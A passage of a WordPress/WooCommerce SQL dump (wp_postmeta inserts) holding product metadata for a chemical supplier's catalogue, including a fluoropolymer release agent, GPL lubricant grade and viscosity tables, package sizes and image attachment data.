:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1578, 400, '_thumbnail_id', '401'); 
INSERT INTO `wp_postmeta` VALUES (1579, 400, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (1580, 400, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (1581, 400, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 143px;" width="336">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="133">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>Light Yellow Emulsion</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>None</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.0 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>None</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (1582, 400, '317_default_editor', '12 oz Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (1583, 400, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (1584, 400, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (1585, 400, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1586, 400, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1587, 400, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (1588, 400, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1589, 400, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (1590, 400, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (1591, 400, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (1592, 400, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (1593, 400, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (1594, 400, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (1595, 400, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (1596, 400, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (1597, 400, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (1598, 400, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (1599, 400, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (1600, 400, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (1601, 400, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1602, 400, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1603, 400, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (1604, 400, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (1605, 400, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (1606, 400, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (1607, 400, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1608, 400, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1609, 400, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (1610, 400, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (1611, 400, '_product_image_gallery', '1797'); 
INSERT INTO `wp_postmeta` VALUES (1612, 400, '318_custom_list_file', 'a:2:{s:32:"e8dd0d519245bbe00465d48930b91398";a:3:{s:4:"name";s:15:"ReleaSys 82-TDS";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-82-1.pdf";s:4:"desc";s:15:"ReleaSys 82-TDS";}s:32:"c1ff928022eb3699c2df09038620cb72";a:3:{s:4:"name";s:39:"ReleaSys Release Agent Product Overview";s:4:"file";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-aerosol.pdf";s:4:"desc";s:39:"ReleaSys Release Agent Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (1613, 402, '_edit_lock', '1475589410:2'); 
INSERT INTO `wp_postmeta` VALUES (1614, 402, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (1615, 402, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (1616, 402, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (1617, 402, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (1618, 402, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (1619, 402, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (1620, 402, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (1621, 402, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1622, 402, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1623, 402, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (1624, 402, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1625, 402, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (1626, 402, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (1627, 402, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (1628, 402, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (1629, 402, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (1630, 402, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (1631, 402, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (1632, 402, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (1633, 402, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (1634, 402, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (1635, 402, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (1636, 402, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1637, 402, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1638, 402, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (1639, 402, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (1640, 402, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (1641, 402, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (1642, 402, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1643, 402, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1644, 402, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (1645, 402, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (1646, 402, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (1647, 402, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1648, 402, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1649, 402, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (1650, 402, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (1651, 402, '_product_image_gallery', '380,375,377,379,381'); 
INSERT INTO `wp_postmeta` VALUES (1676, 402, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (1677, 402, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (2133, 410, '_edit_lock', '1475591630:2'); 
INSERT INTO `wp_postmeta` VALUES (2134, 410, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (2135, 410, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (2136, 410, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (2137, 410, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (2138, 410, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (2139, 410, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (2140, 410, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (2141, 410, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2142, 410, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2143, 410, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (2144, 410, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2145, 410, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (2146, 410, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (2147, 410, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (2148, 410, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (2149, 410, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2150, 410, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2151, 410, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2152, 410, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (2153, 410, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (2154, 410, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2155, 410, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (2156, 410, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2157, 410, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2158, 410, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (2159, 410, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2160, 410, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2161, 410, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (2162, 410, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2163, 410, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2164, 410, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (2165, 410, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (2166, 410, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (2167, 410, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2168, 410, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2169, 410, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (2170, 410, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (2171, 410, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (2196, 410, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (2197, 410, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (2655, 400, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (2656, 419, '_edit_lock', '1496599674:3'); 
INSERT INTO `wp_postmeta` VALUES (2657, 419, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (2658, 420, '_wp_attached_file', '2016/08/Tire-molding-Releasys-85.jpg'); 
INSERT INTO `wp_postmeta` VALUES (2659, 420, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3050;s:6:"height";i:2288;s:4:"file";s:36:"2016/08/Tire-molding-Releasys-85.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"Tire-molding-Releasys-85-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"Tire-molding-Releasys-85-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"Tire-molding-Releasys-85-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"Tire-molding-Releasys-85-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"Tire-molding-Releasys-85-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"Tire-molding-Releasys-85-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"Tire-molding-Releasys-85-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"Tire-molding-Releasys-85-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (2660, 419, '_thumbnail_id', '420'); 
INSERT INTO `wp_postmeta` VALUES (2661, 421, '_edit_lock', '1475593013:2'); 
INSERT INTO `wp_postmeta` VALUES (2662, 421, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (2663, 421, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (2664, 421, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (2665, 421, '312_default_editor', '<table width="1368">\r\n<tbody>\r\n<tr>\r\n<td width="208">Oil Grades</td>\r\n<td style="text-align: center;" width="145"><strong>100</strong></td>\r\n<td style="text-align: center;" width="145"><strong>101</strong></td>\r\n<td style="text-align: center;" width="145"><strong>102</strong></td>\r\n<td style="text-align: center;" width="145"><strong>103</strong></td>\r\n<td style="text-align: center;" width="145"><strong>104</strong></td>\r\n<td style="text-align: center;" width="145"><strong>105</strong></td>\r\n<td style="text-align: center;" width="145"><strong>106</strong></td>\r\n<td style="text-align: center;" width="145"><strong>107</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Oil Viscosity Index</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">29</td>\r\n<td style="text-align: center;">92</td>\r\n<td style="text-align: center;">111</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">145</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">-94-150</td>\r\n<td style="text-align: center;">-94-220</td>\r\n<td style="text-align: center;">-81-270</td>\r\n<td style="text-align: center;">-76-310</td>\r\n<td style="text-align: center;">-60-355</td>\r\n<td style="text-align: center;">-33-400</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (2666, 421, '317_default_editor', '<table class=" aligncenter">\r\n<tbody>\r\n<tr>\r\n<td width="104"><strong>Syringe</strong></td>\r\n<td width="104"><strong>Dab-O-Matic</strong></td>\r\n<td width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td width="104"><strong>Jar</strong></td>\r\n<td width="104"><strong>Bottle</strong></td>\r\n<td width="104"><strong>Jug</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="104">.5 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">.5 kg</td>\r\n<td width="104">1 kg</td>\r\n<td width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">1 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104">20 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">2 oz.</td>\r\n<td width="104">-</td>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (2667, 421, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (2668, 421, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (2669, 421, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2670, 421, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2671, 421, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (2672, 421, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2673, 421, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (2674, 421, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (2675, 421, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (2676, 421, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (2677, 421, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (2678, 421, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2679, 421, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2680, 421, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2681, 421, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (2682, 421, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (2683, 421, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2684, 421, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (2685, 421, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2686, 421, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2687, 421, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (2688, 421, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2689, 421, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2690, 421, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (2691, 421, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2692, 421, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2693, 421, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (2694, 421, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (2695, 421, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (2697, 421, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (2699, 419, '_visibility', 'visible'); 
